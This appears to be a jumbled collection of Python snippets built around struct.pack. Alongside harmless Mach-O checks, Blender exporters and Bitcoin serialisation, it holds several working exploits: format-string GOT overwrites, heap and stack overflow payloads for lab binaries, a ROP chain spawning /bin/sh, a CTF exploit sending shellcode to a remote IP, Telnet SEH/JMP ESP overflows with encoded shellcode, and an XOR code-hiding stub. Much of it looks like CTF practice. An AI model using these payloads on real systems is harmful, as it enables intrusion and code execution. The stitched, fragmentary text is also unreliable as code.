def isSupportedFile(cls, fileName): try: with open(fileName, 'rb') as f: magic = f.read(4) return magic == p('>I', 0xfeedface) or magic == p('>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p('<I', 0xfeedfacf) except BaseException as e: raise LoaderError(e)
def var_int_ser(self, mint): assert mint > 0 assert mint < uint64_max if mint < 0xff - 2: return p('B', mint) elif mint < uint16_max: return b'\xfd' + p('H', mint) elif mint < uint32_max: return b'\xfe' + p('I', mint) elif mint < uint64_max: return b'\xff' + p('L', mint)
def export_main(object, file): mesh = object.data file.write(p('III', 0x0, 4, 0)) # version block file.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block for polygon in mesh.polygons: v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy mat = object.material_slots[polygon.material_index].material file.write( p('9fIf', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z, mat.stalker2sided, mat.stalkerOCC))
def isSupportedFile(cls, fileName): try: with open(fileName, "rb") as f: magic = f.read(4) return ( magic == p(">I", 0xFEEDFACE) or magic == p(">I", 0xFEEDFACF) or magic == p("<I", 0xFEEDFACE) or magic == p("<I", 0xFEEDFACF) ) except BaseException as e: raise LoaderError(e)
def export_som(mesh, path, use2sided=False): f = open(path, 'wb') f.write(p('III', 0x0, 4, 0)) # version block f.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block two_sided, occ = int(use2sided), 0.0 for polygon in mesh.polygons: v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy tris = p('9f', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z) option = p('If', two_sided, occ) f.write(tris + option) f.close()
def export_som(ob, path): mesh = ob.data f = open(path, 'wb') f.write(p('III', 0x0, 4, 0)) # version block f.write(p('II', 0x1, len(mesh.polygons) * 44)) # polygons block for polygon in mesh.polygons: v1x, v1y, v1z = mesh.vertices[polygon.vertices[0]].co.xzy v2x, v2y, v2z = mesh.vertices[polygon.vertices[2]].co.xzy v3x, v3y, v3z = mesh.vertices[polygon.vertices[1]].co.xzy tris = p('9f', v1x, v1y, v1z, v2x, v2y, v2z, v3x, v3y, v3z) mat = ob.material_slots[polygon.material_index].material option = p('If', mat.xray_2_sided, mat.xray_occ) f.write(tris + option) f.close()
def ser(self): self.get_payload() self.length, self.checksum = self.get_length_checksum() assert self.magic assert self.command return p('Q12sQQ', self.magic, self.command, self.length, self.checksum) + self.payload
def __init__(self, code_to_protect): # CPU Disasm # Address Hex dump Command Comments # <ModuleEn . E8 00000000 CALL decrypt_stub.00401005 # 00401005 $ 58 POP EAX # 00401006 . 05 1A000000 ADD EAX,1A # 0040100B > 8B18 MOV EBX,DWORD PTR [EAX] # 0040100D . 81FB 12A196B1 CMP EBX,B196A112 # 00401013 . 0F84 06000000 JE decrypt_stub.0040101F # 00401019 . 8030 F1 XOR BYTE PTR [EAX],F1 # 0040101C . 40 INC EAX # 0040101D .^ EB EC JMP SHORT decrypt_stub.0040100B self.decrypt_stub_original = '\xE8\x00\x00\x00\x00' '\x58' '\x05\x1A\x00\x00\x00' '\x8B\x18' '\x81\xFB\x12\xA1\x96\xB1' '\x0F\x84\x06\x00\x00\x00' '\x80\x30\xF1' '\x40' '\xEB\xEC' # find where the xor key is set self.idx_xor_key = self.decrypt_stub_original.find('\xf1') # find where the magic dword is compared self.idx_magic_dword = self.decrypt_stub_original.find('\x12\xA1\x96\xB1') # generate a 1byte xor key self.key = randint(0, 0xff) # generate a 4bytes magic dword self.magic_dword = p('<I', randint(0, 0xffffffff)) # protecting the code with a simple xor self.code_to_protect_xored = ''.join([chr(ord(b) ^ self.key) for b in code_to_protect]) + self.magic_dword # modify the decrypt stub self.decrypt_stub = bytearray(self.decrypt_stub_original) self.decrypt_stub[self.idx_xor_key] = self.key self.decrypt_stub[self.idx_magic_dword : self.idx_magic_dword + 4] = self.magic_dword self.decrypt_stub = str(self.decrypt_stub)
def execute(self, context): startTime = time.time() path = bpy.context.scene.exportCformDir path = path.encode(encoding='cp1251') f = open(path + b'level.cform', 'wb') f.write(b'\x04\x00\x00\x00') me = context.scene.objects.active.data vertCnt = len(me.vertices) triCnt = len(me.polygons) f.write(p('II', vertCnt, triCnt)) f.write(p('6f', -100, -100, -100, 100, 100, 100)) for v in me.vertices: f.write(p('3f', v.co.x, v.co.z, v.co.y)) gameMtl = [] for mat in context.scene.objects.active.data.materials: gameMtl.append(mat.stalkerMatID) ob = context.scene.objects.active for face in me.polygons: f.write( p('III', face.vertices[0], face.vertices[2], face.vertices[1])) vertID = face.vertices[0] vertex = me.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = ob.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) else: vertID = face.vertices[1] vertex = me.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = ob.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) else: vertID = face.vertices[2] vertex = me.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = ob.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) f.write(p('HH', gameMtl[face.material_index] | 0xc000, sectorID)) print('total time: {0:.6}'.format(time.time() - startTime)) f.close() return {'FINISHED'}
def isSupportedContent(cls, fileContent): """Returns if the files are valid for this filetype""" magic = bytearray(fileContent)[:4] magics = ( p('>I', 0xfeedface), p('>I', 0xfeedfacf), p('>I', 0xcafebabe), p('<I', 0xfeedface), p('<I', 0xfeedfacf), p('<I', 0xcafebabe), ) return magic in magics
def export_main(object, file): fmtVer = 4 file.write(p('I', fmtVer)) mesh = object.data vertCnt = len(mesh.vertices) faceCnt = len(mesh.polygons) file.write(p('II', vertCnt, faceCnt)) bBox = [ object.bound_box[0][0], object.bound_box[0][2], object.bound_box[0][1], object.bound_box[6][0], object.bound_box[6][2], object.bound_box[6][1] ] file.write(p('6f', bBox[0], bBox[1], bBox[2], bBox[3], bBox[4], bBox[5])) for v in mesh.vertices: file.write(p('3f', v.co.x, v.co.z, v.co.y)) gameMtl = [] for mat in mesh.materials: gameMtl.append(mat.stalkerMatID) for face in mesh.polygons: file.write( p('III', face.vertices[0], face.vertices[2], face.vertices[1])) vertID = face.vertices[0] vertex = mesh.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = object.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) else: vertID = face.vertices[1] vertex = mesh.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = object.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) else: vertID = face.vertices[2] vertex = mesh.vertices[vertID] if len(vertex.groups) == 1: groupID = vertex.groups[0].group vertexGroup = object.vertex_groups[groupID] vertexGroupName = vertexGroup.name sectorID = int(vertexGroupName) file.write(p('HH', gameMtl[face.material_index] | 0xc000, sectorID))
#!/usr/bin/python from struct import pack as p t1 = p("I", 0x080496f4) t2 = p("I", 0x080496f6) s = '' s += t1 s += t2 s += '\%21818x' s += '\%12$n' s += '\%43964x' s += '\%13$n' print s
def isSupportedContent(cls, fileContent): """Returns if the files are valid for this filetype""" magic = bytearray(fileContent)[:4] return magic == p('>I', 0xfeedface) or magic == p('>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p('<I', 0xfeedfacf)
break index += 1 textsec = pe.sections[index].get_data() md = Cs(CS_ARCH_X86, arch) nw = "" addr = pe.sections[index].VirtualAddress jmptable = [] f = 0 r = 0 j = 0 for i in md.disasm(textsec, 0): insb = ''.join(format(x, '02x') for x in i.bytes) if i.mnemonic in topatch: try: dest = p("<Q", addr + int(i.op_str, 16)) nwinsb = "cc" n = 0 while n != (len(i.bytes) - 1): nwinsb += "90" n += 1 insb = nwinsb typ = gettype(i.mnemonic) jmptable.append(p("<Q", addr + i.address) + p("<Q", typ) + dest) r += 1 except: print "Wont patch" else: if j % 2 == 0: jmptable.append( p("<Q", addr + i.address) +
#!/usr/bin/python from struct import pack as p exitgot1 = p("I", 0x08049724) exitgot2 = p("I", 0x08049724 + 1) exitgot3 = p("I", 0x08049724 + 2) exitgot4 = p("I", 0x08049724 + 3) s = '' s += exitgot1 s += exitgot2 s += exitgot3 s += exitgot4 s += '\%162x' s += '\%4$hhn' s += '\%206x' s += '\%5$hnn' s += '\%125x' s += '\%6$hnn' s += '\%257x' s += '\%7$hnn' print s
shellcode += 'B' * 50 opcion = raw_input( "\n 1) Run Exploit Ejemplo\n 2) Run Exploit Return\n 3) Run Exploit Seh\n\n > " ) if opcion == "1": padding = 'A' * 50 cookie = 'XXXX' payload = padding + cookie size = 800 elif opcion == "2": padding = 'A' * (2512 - len(shellcode)) retorno = p('<I', 0x62601453) # jmp eax help.dll relleno = 'C' * 150 payload = shellcode + padding + retorno + relleno size = 680 elif opcion == "3": padding = 'A' * (1820 - len(shellcode)) nhandler = "\x71\x0B" # jno short 0xb nhandler += "\x70\x0B" # jo short 0xb handle = p('<I', 0x6260145E) # ppr help.dll jmpback = 'B' * 10 + '\xE9\xC5\xFE\xFF\xFF' + 'B' * 10 payload = padding + shellcode + nhandler + handle + jmpback + 'D' * 3000 size = 680
#!/usr/bin/python from struct import pack as p #./heap0 `python /tmp/x.py` winnerret = p("I", 0x08048464) s = '' s += 'A' * 72 s += winnerret print s
#!/usr/bin/python from struct import pack as p #./heap1 `/tmp/x.py` putsgot = p("I", 0x08049774) winnerpointer = p("I", 0x08048494) s = '' s += 'A' * 20 s += putsgot s += ' ' s += winnerpointer print s
#!/usr/bin/python from struct import pack as p putsgot = p("I", 0x0804b128 - 12) #0x08048796 heapaddr = p("I", 0x804c000 + 8) sc = 'b864880408ffe0'.decode('hex') # mov eax, 0x08048864; jmp eax s = '' s += '\x90' * 12 s += sc s += ' ' s += 'BBBB' * 7 s += p("I", 0xffffffff) s += p("I", 0xffffffff) s += p("I", 0xfffffffc) s += ' ' s += 'D' s += putsgot s += heapaddr print s
POPRDI = 0x0000000000400c23 # pop rdi ; ret PLTPUT = 0x00000000004007a0 p0 = subprocess.Popen(['./hellcode'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) raw_input("ready!\n") payload = "\x68\x10\x08\x40\x00\x54\x5f\x48\x8b\x14\x25\xb0\x20\x60\x00\xc3" #68 10 08 40 00 push 0x400810 #54 push rsp #5f pop rdi #48 8b 14 25 b0 20 60 00 mov rdx, QWORD PTR ds:0x6020b0 #c3 ret payload += "/bin/sh\x00" payload += p("<Q", POPRDI) payload += p("<Q", GOTGETGID) payload += p("<Q", PLTPUT) payload += p("<Q", REENTER) payload += "/bin/sh\x00" payload += "\x00\x00\x00\x00\x00\x00\x00\x00" payload += "\x00\x00\x00\x00\x00\x00\x00\x00" print p0.stdout.readline() p0.stdin.write(payload+"\n") d = p0.stdout.readline().split("Please enter your code: ")[1][:-1] leak = int(d[::-1].encode('hex'), 16) magic = leak - OFFMAGIC print "Leak getgid() == " + hex(leak) print "Magic(execve()) is at == " + hex(magic)
# TUCTF 2016 # especiallygoodjmps (PWN/75) # # @a: Smoke Leet Everyday # @u: https://github.com/smokeleeteveryday # from pwn import * from struct import pack as p, unpack as u host, port = ('130.211.202.98', 7575) r = remote(host, port) # prepare eip + ebp overwrite values new_eip = p('<I', 0x0804A048) # > 0804A048 meow new_ebp = p('<I', 0xDEADBEEF) # prepare shellcode shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # prepare payload payload = "B"*40 + new_ebp + new_eip + shellcode # send payload to victim print r.recvuntil('What\'s your name?\n') r.sendline(payload) print r.recvuntil('What\'s your favorite number?\n') # construct 4-byte trampoline in meow h = '\x90\x90\xff\xe4' # jmp esp = ff e4
# TUCTF 2016 # especiallygoodjmps (PWN/75) # # @a: Smoke Leet Everyday # @u: https://github.com/smokeleeteveryday # from pwn import * from struct import pack as p, unpack as u host, port = ('130.211.202.98', 7575) r = remote(host, port) # prepare eip + ebp overwrite values new_eip = p('<I', 0x0804A048) # > 0804A048 meow new_ebp = p('<I', 0xDEADBEEF) # prepare shellcode shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # prepare payload payload = "B" * 40 + new_ebp + new_eip + shellcode # send payload to victim print r.recvuntil('What\'s your name?\n') r.sendline(payload) print r.recvuntil('What\'s your favorite number?\n') # construct 4-byte trampoline in meow h = '\x90\x90\xff\xe4' # jmp esp = ff e4
def isSupportedContent(cls, fileContent): """Returns if the files are valid for this filetype""" magic = bytearray(fileContent)[:4] return magic == p('>I', 0xfeedface) or magic == p( '>I', 0xfeedfacf) or magic == p('<I', 0xfeedface) or magic == p( '<I', 0xfeedfacf)
#!/usr/bin/python from struct import pack as p #(python exploit.py ; cat) | ./stack6 pad = "A" * 80 ret = p("I", 0xb7ecffb0) binsh = p("I", 0xb7fb63bf) all = pad + ret + "BBBB" + binsh print all
def ser_payload(self): return p('Q', nonce)
buf += "\x81\xf2\xb0\xd4\xb2\xfc\x1a\x7d\x5a\x01\xa5\x84\xa2" buf += "\x8c\x43\xec\xc4\xd8\xdc\x98\x26\x3f\xd5\x3f\x58\x15" buf += "\x4d\xd7\x11\x7f\x4a\xd8\xa1\x55\xfc\x4e\x2a\xba\x38" buf += "\x6f\x2d\x97\x68\xf8\xba\x6d\xf9\x4b\x5a\x71\xd0\x3b" buf += "\xff\xe0\xbf\xbb\x76\x19\x68\xec\xdf\xef\x61\x78\xf2" buf += "\x56\xd8\x9e\x0f\x0e\x23\x1a\xd4\xf3\xaa\xa3\x99\x48" buf += "\x89\xb3\x67\x50\x95\xe7\x37\x07\x43\x51\xfe\xf1\x25" buf += "\x0b\xa8\xae\xef\xdb\x2d\x9d\x2f\x9d\x31\xc8\xd9\x41" buf += "\x83\xa5\x9f\x7e\x2c\x22\x28\x07\x50\xd2\xd7\xd2\xd0" buf += "\xe2\x9d\x7e\x70\x6b\x78\xeb\xc0\xf6\x7b\xc6\x07\x0f" buf += "\xf8\xe2\xf7\xf4\xe0\x87\xf2\xb1\xa6\x74\x8f\xaa\x42" buf += "\x7a\x3c\xca\x46" username = '******' password = '******' + 'a' * 2500 password += p('<I', 0x71401461) # mov ecx,esp/ret password += p('<I', 0x71401478) # mov esi,ecx/ret password += p('<I', 0x71401464) # add esi,14h/ret password += p('<I', 0x71401468) # jmp esi shellcode = '\x90' * 10 shellcode += buf shellcode += '\x90' * 10 try: print "\n Generando conexion a Telnet...\n" client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((host, port)) print " [+] Enviando Username..." sleep(3)
#!/usr/bin/python from struct import pack as p #using cat to keep pipes open #(python /tmp/exploit.py ; cat) | ./stack5 shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" sled = "\x90" * (76 - len(shellcode)) eip = p("I", 0xbffff7c0) pad = "A" * 76 all = pad + eip + sled + shellcode print all
buf += "\x10\xfe\xdb\xdc\xea\xb4\xc3\xab\xb7\x68\xf2\x40\xa4" buf += "\x5d\xbd\x1d\x1f\x15\x3c\xcc\x51\xd6\x0f\xd0\x6e\x84" buf += "\xeb\x10\xfa\xd2\x32\x5f\x0e\xdc\x73\x8b\xe5\xe5\x07" buf += "\x68\x2e\x6f\x16\xfb\x74\xab\xd9\x17\xee\x38\xd5\xac" buf += "\x64\x64\xf9\x33\x90\x12\x05\xbf\x67\xcd\x8c\xfb\x43" buf += "\x11\xef\xc0\x3e\x21\xc6\x12\xb7\xd7\x91\x59\xa0\x99" buf += "\xef\x53\xdd\xf4\x07\xf4\xe2\x06\x28\x82\x58\xfd\x6d" buf += "\xeb\xba\x1f\xe2\x93\x27\xc4\x56\x74\xd9\xfb\xa9\x7b" buf += "\x6f\x46\x5d\xec\x1c\x25\x7d\xad\xb4\x86\x4f\x03\x21" buf += "\x81\xda\x28\xcc\x23\x14\x14\x86\x98\x70\xa0\x1e\xc6" buf += "\x2e\x4b\x75\x03\x47\x71\x26\xb0\xff\xd4\x8a\x7a\x78" buf += "\x04\x31\xd1\x6e\x6a\xc6\x2a\x91\xfd\x56\xb2\x35\xde" buf += "\xce\x53\xac\x6a\x66\xc4\x4b\xeb\x08\x78\xa2\xd0\x61" buf += "\xdc\xe0\xec\xf8\x3e\x80\xa8\xda\xe0\x70\x21\x6b\x96" buf += "\x1e\xd5\xba\x91\x56\x59\x99\x25\xef\x83\xd0\xf7\xbd" buf += "\x10\x42\xaa\xbe\x47\x55\x8a\x10\x97\xc3\x02" buf += '\x41' * 20 minirop = '\x83\xEC\x7F' * 4 # SUB ESP,0x7F minirop += '\xFF\xD4' # CALL ESP active = '-' padd = '\x41' * (1055 - len(buf)) retn = p('<I', 0x6D881457) # JMP ESP basura = '\x41' * 5 payload2 = active + padd + buf + retn + minirop stdin.write(payload2 + '\n') print stdout.read(1024)